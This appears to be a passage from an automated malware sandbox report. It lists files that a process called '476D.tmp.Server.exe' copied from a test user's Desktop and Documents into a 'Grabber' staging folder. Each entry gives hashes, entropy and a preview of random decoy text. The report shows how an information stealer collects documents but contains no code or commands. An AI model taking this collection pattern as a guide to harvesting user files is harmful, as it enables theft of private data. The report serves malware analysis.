Preview:	NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Desktop\VLZDGUKUTZ\VLZDGUKUTZ.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
Reputation:	unknown
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Desktop\WUTJSCBCFX.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.688284131239007
Encrypted:	false
SSDEEP:	24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
MD5:	E8ACCA0F46CBA97FE289855535184C72
SHA1:	059878D0B535AEE9092BF82886FC68DC816D9F08
SHA-256:	CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
SHA-512:	185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
Malicious:	false
Reputation:	unknown
Preview:	WUTJSCBCFXNSEWGLWGYOOQVVDPFNFUMPQAJVNXNKMXQRORVUIYYNQWAMOZTIZPEADOKEPDLVMNENFIICEKOTBVPODCEHVNDEMTCADGQBTUSRFDCQOFZZQCSIEKBJNREDYYVFOXFLSAVVRDBODQPUEQUZAVGFLXOWSKRTDQOYTNPZUFOPXFJPIZPUZNQGPAVLZQOLZQMEBSIDSSSOCJNYRGTGEHRLTXLSBXCVGBOIDKKEIUHPVJXFIBUKHHHIZJXBNSFVSIBUVDLJVQHLZQNPKVUYGSBYLDPVSZZIAGXVZKTZMOMHKJTCACLNIHVZQOYHZUOCHMTDPXWSWWCTZKVXUPJXTUQVYKVNBTOOXYSOQYGOROUJYIQIBLZXWHWHSDDSIDRAQBFHFUASJJFJZGJMXLKHMELZDCBSAECBJUYDLONQSYTFIGRFXVYQXQGOAYYQXFJQFPARQPKZARUFLFZALPMOXFKFAAFQYQJSBYRLXSYWILKBWNNKNPTXDFHFCBTUEWYUGEMBZMEFHNMBDRELQEYFKIFARDWZODMHWXQBTISSHAEWZTVFJRKELIBQQEXSWFZUGGGKZXSPWOXYPOCCJIHNGOPVFNWYZRPTOWAGQPVVZLHPYYBDQTUFWFIVGYOBQSXERHTUDUHOJIRJFKQQOOIXOHPHYQPYDGSQQNOEUWFVOVYMHEJBARDLGPVSTERBBBFSGVNSUAZCVAXBSTLPAQENSALLVBNGJHCERSSMMHCALJSZJJKDFYFVTEQEUIBYNZPMUJQZNJVUGNGKENCJKNBTKBYOEUUGFFKIBVHNAUHYEUNDBZPKFZERTSXYHOMVAJJBPSNOOYHZFWINWEJCFGHKIORUHARZYNBKYMOWZHDVWQBITESVLGVECBBJDDHUCWOJFWBQJSKRWHJPPGEKBDXIPJJDDYHGUCDCBZQDUVHEBPPQBUDSOAYQTNFMYUBRJNRJFSMUCNFWURFGGIHZFMXDVIINVRGXSRYXBYBI

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Desktop\XZXHAVGRAG.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69156792375111
Encrypted:	false
SSDEEP:	24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
MD5:	A4E170A8033E4DAE501B5FD3D8AC2B74
SHA1:	589F92029C10058A7B281AA9F2BBFA8C822B5767
SHA-256:	E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
SHA-512:	FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
Malicious:	false
Reputation:	unknown
Preview:	XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Desktop\XZXHAVGRAG\KATAXZVCPS.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699548026888946
Encrypted:	false
SSDEEP:	24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
MD5:	A0DC32426FC8BF469784A49B3D092ADC
SHA1:	0C0EEB9B226B1B19A509D9864F8ADC521BF18350
SHA-256:	A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
SHA-512:	DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
Malicious:	false
Reputation:	unknown
Preview:	KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Desktop\XZXHAVGRAG\ONBQCLYSPU.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699434772658264
Encrypted:	false
SSDEEP:	24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
MD5:	02D3A9BE2018CD12945C5969F383EF4A
SHA1:	085F3165672114B2B8E9F73C629ADABBF99F178D
SHA-256:	6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
SHA-512:	A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
Malicious:	false
Reputation:	unknown
Preview:	ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Desktop\XZXHAVGRAG\UMMBDNEQBN.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695685570184741
Encrypted:	false
SSDEEP:	24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
MD5:	A28F7445BB3D064C83EB9DBC98091F76
SHA1:	D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
SHA-256:	10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
SHA-512:	42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
Malicious:	false
Reputation:	unknown
Preview:	UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Desktop\XZXHAVGRAG\VLZDGUKUTZ.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
Reputation:	unknown
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Desktop\XZXHAVGRAG\XZXHAVGRAG.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69156792375111
Encrypted:	false
SSDEEP:	24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
MD5:	A4E170A8033E4DAE501B5FD3D8AC2B74
SHA1:	589F92029C10058A7B281AA9F2BBFA8C822B5767
SHA-256:	E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
SHA-512:	FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
Malicious:	false
Reputation:	unknown
Preview:	XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Desktop\desktop.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	282
Entropy (8bit):	3.514693737970008
Encrypted:	false
SSDEEP:	6:QyqRsioTA5wmHOlRaQmZWGokJqAMhAlWygDAlLwkAl2FlRaQmZWGokJISlfY:QZsiL5wmHOlDmo0qmWvclLwr2FlDmo0I
MD5:	9E36CC3537EE9EE1E3B10FA4E761045B
SHA1:	7726F55012E1E26CC762C9982E7C6C54CA7BB303
SHA-256:	4B9D687AC625690FD026ED4B236DAD1CAC90EF69E7AD256CC42766A065B50026
SHA-512:	5F92493C533D3ADD10B4CE2A364624817EBD10E32DAA45EE16593E913073602DB5E339430A3F7D2C44ABF250E96CA4E679F1F09F8CA807D58A47CF3D5C9C3790
Malicious:	false
Reputation:	unknown
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.8.3.....

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Documents\HTAGVDFUIE.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692693183518806
Encrypted:	false
SSDEEP:	24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
MD5:	78F042E25B7FAF970F75DFAA81955268
SHA1:	F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
SHA-256:	E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
SHA-512:	CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
Malicious:	false
Reputation:	unknown
Preview:	HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYP